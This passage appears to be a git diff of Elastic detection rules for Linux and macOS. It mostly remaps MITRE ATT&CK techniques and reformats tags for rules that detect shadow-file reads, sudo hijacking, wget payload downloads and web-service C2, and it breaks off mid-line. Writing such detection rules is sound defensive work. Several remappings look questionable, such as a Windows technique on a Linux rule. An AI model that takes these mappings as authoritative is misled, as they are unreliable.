timestamp_override = "event.ingested" type = "eql" @@ -97,11 +104,16 @@ DebugFS is a Linux utility that provides a low-level interface to access and man framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml index 720aed99079..e4e20b3b750 100644 --- a/rules/linux/privilege_escalation_shadow_file_read.toml +++ b/rules/linux/privilege_escalation_shadow_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -103,6 +112,18 @@ host.os.type : "linux" and event.category : "process" and event.action : ("exec" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -117,6 +138,7 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml index 832ec099d33..c90a6990fbb 100644 --- a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml +++ b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -114,14 +114,9 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml index edb6791dcf1..b137cf4d019 100644 --- a/rules/linux/privilege_escalation_sudo_hijacking.toml +++ b/rules/linux/privilege_escalation_sudo_hijacking.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -123,19 +123,6 @@ file.path in ("/usr/bin/sudo", "/bin/sudo") and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -150,3 +137,16 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml index 18f20937a5d..a679ec48580 100644 --- a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml +++ b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -103,6 +103,11 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml index b1539ceef80..0035cfea05d 100644 --- a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -46,7 +46,15 @@ However, if more advanced configuration is required to detect specific behavior, -- "-w /root/ -p rwxa -k audit_root" """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -101,31 +109,14 @@ In Linux, CAP_CHOWN and CAP_FOWNER are capabilities that allow processes to chan [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique.subtechnique]] -id = "T1222.002" -name = "Linux and Mac File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/002/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml index 80df457f7e6..923962a5d96 100644 --- a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml +++ b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/22" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -68,7 +68,15 @@ However, if more advanced configuration is required to detect specific behavior, -- "-w /etc/passwd -p wa -k etcpasswd" """ severity = "medium" -tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -116,31 +124,14 @@ In Linux environments, the `/etc/passwd` file is crucial for managing user accou [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml index 0ecf1365784..a179911f656 100644 --- a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -122,6 +122,11 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml index 2634a5f0b87..46af7128890 100644 --- a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml +++ b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -81,7 +81,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -108,19 +116,33 @@ and process.parent.name:("bash" or "dash" or "sh" or "tcsh" or "csh" or "zsh" or framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1548.001" -name = "Setuid and Setgid" -reference = "https://attack.mitre.org/techniques/T1548/001/" +id = "T1574.013" +name = "KernelCallbackTable" +reference = "https://attack.mitre.org/techniques/T1574/013/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml index 83b68d9963f..05c5c6f2abf 100644 --- a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml +++ b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -121,9 +121,9 @@ process.executable: "/usr/bin/unshare" and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml index d33678e809c..298a32c90fc 100644 --- a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml +++ b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -75,40 +75,30 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" + [rule.threat.tactic] + name = "Collection" + id = "TA0009" + reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat.technique.subtechnique]] -id = "T1074.001" -name = "Local Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/001/" + [[rule.threat.technique]] + name = "Data Staged" + id = "T1074" + reference = "https://attack.mitre.org/techniques/T1074/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat.technique.subtechnique]] + name = "Local Data Staging" + id = "T1074.001" + reference = "https://attack.mitre.org/techniques/T1074/001/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" + + [[rule.threat.technique]] + name = "System Information Discovery" + id = "T1082" + reference = "https://attack.mitre.org/techniques/T1082/" diff --git a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml index ed184cef7fe..68fa16c9024 100644 --- a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml +++ b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -80,22 +80,30 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" - -[[rule.threat.technique.subtechnique]] -id = "T1074.001" -name = "Local Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/001/" - -[[rule.threat.technique]] -id = "T1560" -name = "Archive Collected Data" -reference = "https://attack.mitre.org/techniques/T1560/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.threat.tactic] + name = "Collection" + id = "TA0009" + reference = "https://attack.mitre.org/tactics/TA0009/" + + [[rule.threat.technique]] + name = "Data Staged" + id = "T1074" + reference = "https://attack.mitre.org/techniques/T1074/" + + [[rule.threat.technique.subtechnique]] + name = "Local Data Staging" + id = "T1074.001" + reference = "https://attack.mitre.org/techniques/T1074/001/" + + [[rule.threat.technique]] + name = "Archive Collected Data" + id = "T1560" + reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/macos/command_and_control_aws_s3_connection_via_script.toml b/rules/macos/command_and_control_aws_s3_connection_via_script.toml index d1e76b8309b..2128dd0828a 100644 --- a/rules/macos/command_and_control_aws_s3_connection_via_script.toml +++ b/rules/macos/command_and_control_aws_s3_connection_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -50,7 +50,14 @@ This rule flags macOS script interpreters (AppleScript, Node.js, Python) that re risk_score = 47 rule_id = "05f2b649-dc03-4e9a-8c4e-6762469e8249" severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "esql" query = ''' FROM logs-endpoint.events.network-* @@ -71,30 +78,30 @@ FROM logs-endpoint.events.network-* [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" + [[rule.threat.technique]] + name = "Exfiltration Over Web Service" + id = "T1567" + reference = "https://attack.mitre.org/techniques/T1567/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique.subtechnique]] + name = "Exfiltration to Cloud Storage" + id = "T1567.002" + reference = "https://attack.mitre.org/techniques/T1567/002/" diff --git a/rules/macos/command_and_control_executable_download_via_wget.toml b/rules/macos/command_and_control_executable_download_via_wget.toml index 2e29febee49..6cc39502d2a 100644 --- a/rules/macos/command_and_control_executable_download_via_wget.toml +++ b/rules/macos/command_and_control_executable_download_via_wget.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -73,12 +73,30 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Ingress Tool Transfer" + id = "T1105" + reference = "https://attack.mitre.org/techniques/T1105/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "User Execution" + id = "T1204" + reference = "https://attack.mitre.org/techniques/T1204/" + + [[rule.threat.technique.subtechnique]] + name = "Malicious File" + id = "T1204.002" + reference = "https://attack.mitre.org/techniques/T1204/002/" diff --git a/rules/macos/command_and_control_google_calendar_c2_via_script.toml b/rules/macos/command_and_control_google_calendar_c2_via_script.toml index 00cfc509299..9d68b0d613a 100644 --- a/rules/macos/command_and_control_google_calendar_c2_via_script.toml +++ b/rules/macos/command_and_control_google_calendar_c2_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -24,7 +24,15 @@ references = [ risk_score = 73 rule_id = "abc7a2be-479e-428b-b0b3-1d22bda46dd9" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] type = "eql" note = """## Triage and analysis @@ -75,17 +83,40 @@ sequence by process.entity_id with maxspan=20s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" + + [[rule.threat.technique.subtechnique]] + name = "Bidirectional Communication" + id = "T1102.002" + reference = "https://attack.mitre.org/techniques/T1102/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1102.001" -name = "Dead Drop Resolver" -reference = "https://attack.mitre.org/techniques/T1102/001/" + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "JavaScript" + id = "T1059.007" + reference = "https://attack.mitre.org/techniques/T1059/007/" diff --git a/rules/macos/command_and_control_network_connection_to_oast_domain.toml b/rules/macos/command_and_control_network_connection_to_oast_domain.toml index 1a6d685d035..0da1e9b9455 100644 --- a/rules/macos/command_and_control_network_connection_to_oast_domain.toml +++ b/rules/macos/command_and_control_network_connection_to_oast_domain.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -22,7 +22,14 @@ references = [ risk_score = 73 rule_id = "54214c47-be7c-4f6b-8ef2-78832f9f8f42" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] type = "eql" note = """## Triage and analysis @@ -70,25 +77,25 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] + name = "Exfiltration Over Web Service" + id = "T1567" + reference = "https://attack.mitre.org/techniques/T1567/" diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml index 219cadf1453..5241029aa80 100644 --- a/rules/macos/command_and_control_perl_outbound_network_connection.toml +++ b/rules/macos/command_and_control_perl_outbound_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -50,7 +50,15 @@ This rule detects Perl starting on macOS and then initiating an outbound connect risk_score = 47 rule_id = "aba3bc11-e02f-4a03-8889-d86ea1a44f76" severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by process.entity_id with maxspan=30s @@ -66,12 +74,30 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" diff --git a/rules/macos/command_and_control_potential_etherhiding_c2.toml b/rules/macos/command_and_control_potential_etherhiding_c2.toml index 75546cf0d82..d6eb9a913f6 100644 --- a/rules/macos/command_and_control_potential_etherhiding_c2.toml +++ b/rules/macos/command_and_control_potential_etherhiding_c2.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -22,7 +22,15 @@ references = [ risk_score = 73 rule_id = "bba8c7d1-172b-435d-9034-02ed9289c628" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] type = "eql" note = """## Triage and analysis @@ -72,17 +80,45 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" + + [[rule.threat.technique.subtechnique]] + name = "Bidirectional Communication" + id = "T1102.002" + reference = "https://attack.mitre.org/techniques/T1102/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = 